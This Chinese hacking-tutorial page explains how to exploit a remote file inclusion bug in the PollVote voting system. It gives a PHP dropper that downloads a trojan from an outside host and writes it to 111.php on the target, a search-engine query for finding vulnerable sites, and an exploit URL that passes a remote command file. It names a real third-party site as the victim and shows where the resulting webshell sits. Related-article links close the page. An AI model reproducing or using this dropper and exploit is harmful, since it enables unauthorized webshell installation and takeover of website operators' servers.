PollVote投票系统漏洞利用

所属分类: 实用技巧 / 漏洞研究 阅读数: 1728
收藏 0 赞 0 分享
PollVote是一个投票系统,今天看了非安全的杂志,看了利用方法, 

不过作者说利用过程的时候很烦琐,关键的时候又没说明白, 

简单的说一下`` 

首先建立2个文本 分别是creatfile.txt和phpdoor.txt 

creatfile.txt内容写 

<? 
$f=file_get_contents("http://www.hackeroo.com/phpdoor.txt"); 
$ff=fopen("111.php","a"); 
fwrite ($ff,$f); 
fclose($ff); 
?> 

phpdoor.txt内容就写个PHP木马 

之后在http://www.google.com 搜索关键词"pollvote.php?pollname" 

有很多, 
搜索到一个http://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg 


就是他了 

EXP是http://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gif?&cmd=ls 

这个就是利用原理了, 
刚才说到的creatfile.txt和phpdoor.txt这个2个文件都上传到自己的空间里 

执行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt 

这样 
phpdoor.txt里的内容就会生成一个111.php 

这样我们就得到WEBSHELL了 

http://www.skinnyturd.co.uk/poll/111.php  
更多精彩内容其他人还在看

悬念音乐程序安装程序写马(图)

悬念音乐程序安装程序写马(图)
收藏 0 赞 0 分享

为什么经常被网络入侵?探究原因

为什么经常被网络入侵?探究原因
收藏 0 赞 0 分享

黑客之门的魅力:感染与加载(图)

黑客之门的魅力:感染与加载(图)
收藏 0 赞 0 分享

诱人视频请君入瓮 解析RealPlayer溢出漏洞

诱人视频请君入瓮 解析RealPlayer溢出漏洞
收藏 0 赞 0 分享

漏洞漫舞的飞骋

漏洞漫舞的飞骋
收藏 0 赞 0 分享

穷追猛打:破译Foxmail“密码天书”

穷追猛打:破译Foxmail“密码天书”
收藏 0 赞 0 分享

BBSXP漏洞再探究

BBSXP漏洞再探究
收藏 0 赞 0 分享

安全技术—RSA公钥密码体制安全性分析

安全技术—RSA公钥密码体制安全性分析
收藏 0 赞 0 分享

蜜罐技术:消除防火墙局限和脆弱

蜜罐技术:消除防火墙局限和脆弱
收藏 0 赞 0 分享

跨站脚本说明

跨站脚本说明
收藏 0 赞 0 分享
查看更多